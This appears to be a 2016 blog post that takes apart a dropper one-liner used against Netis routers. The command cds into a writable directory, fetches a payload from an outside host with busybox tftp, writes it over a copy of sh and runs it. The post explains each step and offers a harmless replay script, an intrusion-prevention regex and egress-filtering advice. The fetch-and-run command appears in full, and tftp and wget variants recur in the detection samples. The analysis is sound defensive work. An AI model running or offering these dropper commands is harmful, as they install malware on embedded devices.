cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 220.127.116.11;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh
So first ...
cd /tmp || cd /var/ || cd /dev/;
The first thing the attacker does is move into a directory where a process on the device is likely to have write permission. The double pipe (||) runs the next command only if the previous one fails: if cd /tmp fails, cd /var/ is tried, and if that fails too, cd /dev/. It is essentially "if this works, stop here; otherwise try the next, otherwise try the next". Note that cd only needs search (execute) permission on the directory, so this chain proves a directory exists and can be entered, not that it is writable; it is the later tftp and cp steps that actually need a writable location. Once the attacker lands in any of those directories he is ready to run the more interesting commands there.
busybox tftp -r min -g 18.104.22.168;
Next the attacker takes advantage of BusyBox, a single binary that bundles many basic Linux commands and ships on many embedded Linux devices (including the exploitable Netis router). One of the applets it provides is tftp, whose usage text is:
tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
-r FILE Remote FILE
-g Get file
So the attacker uses the tftp applet to fetch a remote file called 'min', in this case from the server at 22.214.171.124, and save it under the same name in the current directory (again /tmp, /var, or /dev, whichever cd succeeded). TFTP runs over UDP, needs no credentials and is built into BusyBox, which is why these droppers favour it.
cp /bin/sh .;
Next the attacker copies the real shell binary into the current directory as a file named sh (again in /tmp, /var, or /dev, depending on which cd succeeded).
cat min >sh;
This is the step that is easy to misread. A single > does not append; it truncates sh and writes the contents of min into it. After this command the file named sh no longer contains /bin/sh at all: it is the downloaded payload, byte for byte, wearing the name of the shell. The copy in the previous step only served to create a file that already carries the name (and, on most systems, the execute bit) of a legitimate binary, so the malware shows up as "sh" in process listings. Appending would have required >>, and even then it would not do what one might expect: the kernel loads an ELF binary from its headers and simply ignores trailing bytes, so the original sh would run and the appended data would be dead weight.
chmod 777 sh;
Then the file is made world-readable, writable and executable, so that it can be run no matter what umask was in effect when it was copied.
Finally the attacker runs ./sh, which at this point is the downloaded payload and not a shell, and your device is likely now compromised.
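To see what the chain actually leaves on disk, here is an added example (mine, not code from the original post or from the attacker) that replays the staging steps in a throwaway directory. A harmless shell script stands in for the downloaded "min", the two "missing" directories are hypothetical stand-ins for a cd that fails, and there is no network or tftp involved. It shows the cd fallback landing in the third directory, the > truncating sh rather than appending to it, and ./sh running the payload instead of a shell.

```shell
#!/bin/sh
# Added example, not from the original post: replay the dropper's staging
# steps in a throwaway directory with a harmless stand-in for "min".

# Hypothetical stand-in for the downloaded "min". The real payload is a
# binary; this is a script so that running it is safe and checkable.
PAYLOAD_TEXT='#!/bin/sh
echo payload-ran'

# Runs in a subshell so the caller's working directory is untouched.
# Prints "<overwritten|appended> <payload output>".
stage_dropper() (
    work=$(mktemp -d "${TMPDIR:-/tmp}/drop.XXXXXX") || exit 1

    # The fallback chain: the first directory that can be entered wins.
    # missing1 and missing2 do not exist, so the third cd is the one that
    # succeeds, exactly as "cd /tmp || cd /var/ || cd /dev/" falls through.
    cd "$work/missing1" 2>/dev/null || cd "$work/missing2" 2>/dev/null || cd "$work" || exit 1

    # Stand-in for "busybox tftp -r min -g HOST": a file named min appears.
    printf '%s\n' "$PAYLOAD_TEXT" > min

    cp /bin/sh .                      # the real shell, now a local file "sh"
    before=$(wc -c < sh)

    cat min >sh                       # '>' truncates: sh becomes the payload
    after=$(wc -c < sh)
    if [ "$after" -eq "$(wc -c < min)" ] && [ "$after" -ne "$before" ]; then
        verdict=overwritten           # sh is now exactly the payload
    else
        verdict=appended              # would only happen with >>
    fi

    chmod 777 sh
    out=$(./sh)                       # runs the payload, not /bin/sh

    cd / && rm -rf "$work"
    echo "$verdict $out"
)

stage_dropper                          # prints: overwritten payload-ran
```

Run it as a normal user; it needs only /bin/sh, cp, cat, chmod and mktemp, which BusyBox also provides, so the same script works on an embedded box if you want to confirm the behaviour there.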
As for prevention, I haven't seen anything indicating that Netis has actually patched this, so you probably need an IPS (Intrusion Prevention System) with a signature that matches and blocks this type of traffic. Egress filtering that blocks outbound TFTP (UDP port 69) from the router would also break this particular download step, though an attacker can switch the dropper to wget just as easily.
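The kind of content match such a signature would carry, as an added example of my own rather than anything from the original post or a vendor ruleset, run over a few constructed command strings. The pattern keys on three things that rarely co-occur in legitimate traffic: a cd fallback chain into a writable directory, a BusyBox tftp or wget fetch, and a file written over a local copy named sh. The sample lines and the placeholder hosts are made up for the example, and the rule is a starting point, not a vetted production signature.

```shell
#!/bin/sh
# Added example, not from the original post: a content match for this
# dropper pattern, run over constructed sample command strings.

# cd fallback into /tmp, /var or /dev ... busybox tftp|wget ... cat X >sh
DROPPER_RE='cd +/(tmp|var|dev)/? *[|][|].*busybox +(tftp|wget).*cat +[^ ;]+ *> *sh'

# Exit status 0 if the string matches the dropper pattern.
is_dropper() {
    printf '%s\n' "$1" | grep -Eq "$DROPPER_RE"
}

# Count matching lines on stdin, one command string per line.
count_droppers() {
    n=0
    while IFS= read -r line; do
        if is_dropper "$line"; then n=$((n + 1)); fi
    done
    echo "$n"
}

# Constructed samples: the post's one-liner with a placeholder host, a
# wget variant, and two benign-looking commands that must not match.
SAMPLES='cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 198.51.100.7;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh
cd /tmp || cd /var/;busybox wget http://198.51.100.7/x -O x;cp /bin/sh .;cat x > sh;chmod 777 sh;./sh
cd /tmp && busybox tftp -r config.bin -g 192.0.2.10
cd /var/ || cd /tmp; ls -la'

printf '%s\n' "$SAMPLES" | count_droppers     # prints 2
```

The same regex can be dropped into a grep over captured request bodies or a PCRE-capable IPS rule; the point of the three anchors is that removing any one of them (the cd chain alone, or tftp alone) would false-positive on ordinary embedded housekeeping, as the third sample shows.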
Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.